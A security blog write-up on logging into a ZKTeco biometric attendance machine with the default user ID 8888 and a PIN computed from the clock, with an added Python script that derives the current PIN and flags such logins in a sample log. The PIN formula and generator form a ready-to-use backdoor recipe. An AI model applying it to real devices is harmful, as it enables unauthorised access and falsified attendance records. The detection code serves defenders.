InfoSec Write-ups


How I hacked a biometric machine just by using a calculator

Imagine this: you're surrounded by colleagues carefully placing their thumbs on a seemingly secure biometric attendance machine. You, the security-curious kid in the room, notice it and feel a sudden urge to investigate. A playful smile spread across my face as I thought about the possibilities. Curious? Get ready, because we're about to explore how a basic calculator app can, in some cases and depending on the device's security measures, bypass a biometric system.

Let's set the scene. We're in a place that used a ZKTeco attendance machine (some version; the exact model doesn't matter here). This machine records employee arrivals and departures. Now, I, the curious security enthusiast, can't resist a little investigation. I've seen some complex hacking tutorials online, but they require a laptop and enough time to attract unwanted attention, which is not ideal in a public setting. Then, a glimmer of hope: I stumbled upon a video of someone bypassing the login with nothing but a calculator app. Sounds too fictional to be true, right? Well, that's the beauty of security adventures. I decided to give it a shot. The login screen demanded a user ID and a PIN. The user ID, I found through some reconnaissance, was likely the default "8888". But the PIN was a different story: a long string of 8 or 9 digits, which means 100,000,000 combinations for an 8-digit PIN alone, far too many to brute-force by hand.

I dug into the world of (possibly made-up) mathematical formulas and read about a secret equation that was said to unlock the PIN. Here's where things got a little fuzzy (because, you know, plausibility). The formula: take the current time in 24-hour format as the four-digit number HHMM, subtract it from 9999, and multiply the result by itself.

For instance, if the current time is 4:26 PM (16:26) and you want the PIN for the next minute, so that it is ready when the clock ticks over, you use 1627:

9999 - 1627 = 8372
8372 * 8372 = 70,090,384

And there I had it: a PIN (70090384 in this case) that was supposed to work with user ID 8888. Each PIN is valid only for the minute it was computed for. This one works from 16:27:00 until the clock reaches 16:28, at which point 9999 - 1628 = 8371 and 8371 * 8371 = 70,073,641 takes over. We computed the 16:27 value at 16:26 to save time, then entered it at the right moment. A quick sanity check: HHMM ranges from 0000 to 2359, so the subtraction gives a number between 7640 and 9999 and the PIN is always 8 digits. That also means the "100,000,000 combinations" collapse to just 1,440 possible PINs per day, and anyone who can see a clock knows which one is live.
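The following is an added example, not code from the original post or from ZKTeco. It implements the time-derived PIN formula exactly as the post describes it (9999 minus HHMM, squared, paired with user ID 8888), enumerates every PIN the formula can produce in a day to show how small the real keyspace is, and, for defenders, checks a few constructed log lines for logins that used the time-derived PIN. The log format, the field names and the one-minute clock-skew tolerance are assumptions made for the example.

```python
from datetime import datetime, timedelta

# Added example, not the post's or the vendor's code. It follows the
# formula described in the post: PIN = (9999 - HHMM) ** 2 for user 8888.
# The log format below is constructed for illustration.

DEFAULT_USER_ID = "8888"   # default account named in the post
MAGIC = 9999               # constant the post subtracts the time from


def derive_pin(hour: int, minute: int) -> str:
    """PIN valid during the minute hour:minute (24-hour clock), per the post."""
    if not (0 <= hour <= 23 and 0 <= minute <= 59):
        raise ValueError("invalid time")
    hhmm = hour * 100 + minute          # 16:27 -> 1627
    return str((MAGIC - hhmm) ** 2)     # (9999 - 1627) ** 2 = 70090384


def all_daily_pins() -> set:
    """Every PIN the formula can ever produce in one day (one per minute)."""
    return {derive_pin(h, m) for h in range(24) for m in range(60)}


def is_timed_backdoor_login(user_id: str, pin: str, when: datetime,
                            slack_minutes: int = 1) -> bool:
    """Detection check: did this login use the time-derived PIN?

    Tolerates +/- slack_minutes of clock skew between the device and the
    log timestamp (an assumption of this example, not of the post).
    """
    if user_id != DEFAULT_USER_ID:
        return False
    for delta in range(-slack_minutes, slack_minutes + 1):
        t = when + timedelta(minutes=delta)
        if derive_pin(t.hour, t.minute) == pin:
            return True
    return False


# Constructed sample log: "<iso-timestamp> user=<id> pin=<pin> result=<OK|FAIL>"
SAMPLE_LOG = [
    "2024-05-14T16:27:12 user=8888 pin=70090384 result=OK",    # time-derived PIN
    "2024-05-14T09:03:44 user=1042 pin=2580 result=OK",        # ordinary user
    "2024-05-14T16:30:01 user=8888 pin=12345678 result=FAIL",  # 8888, but not the formula
]


def flag_log(lines):
    """Return the log lines whose PIN matches the time-derived value."""
    hits = []
    for line in lines:
        parts = line.split()
        when = datetime.fromisoformat(parts[0])
        fields = dict(f.split("=", 1) for f in parts[1:])
        if is_timed_backdoor_login(fields["user"], fields["pin"], when):
            hits.append(line)
    return hits


if __name__ == "__main__":
    now = datetime.now()
    print("PIN for the current minute:", derive_pin(now.hour, now.minute))
    print("distinct PINs per day:", len(all_daily_pins()))
    for hit in flag_log(SAMPLE_LOG):
        print("time-derived PIN used:", hit)
```

The detection function is the part worth keeping if you run these devices: any successful login by user 8888 whose PIN equals the value for the surrounding minute is someone using the formula, not someone who knows a secret.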

Now, before you grab your phone and try this on every attendance machine you encounter: this is purely for educational purposes. Messing with attendance systems in real life can have serious consequences. In the real world of security, responsible disclosure is key. If you find a vulnerability, report it to the vendor so they can patch it. And if you administer one of these machines, treat the default 8888 account as a known weak point: a PIN that depends only on the clock is not a secret, so anyone who knows the formula and can see the time can log in.

Well, folks, this tale shows how even a simple calculator can become a sneaky security tool. It reminds us to stay curious, think creatively, and never underestimate the power of imagination. But in the real world, let's keep it ethical and responsible. Playing Sherlock with security is cool, but causing chaos isn't. So keep those brains buzzing, but also keep it safe and legit.

Don’t forget to share, like and follow. Until next time. Happy hacking!


Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by sushil phuyal

a weird guy who loves everything between security and internet

Responses (3)


It didn't work. I tried it to access my Facebook account using a code; it showed a 6-digit code in Gmail, whereas in reality I had calculated an 8-digit code. Both were completely different numbers. Maybe they have upgraded their security system for good.

--

Back in the days when I used to be the "computer guy" at a school, I used to use this technique to gain access to the system when I forgot the password to the biometric thing.

--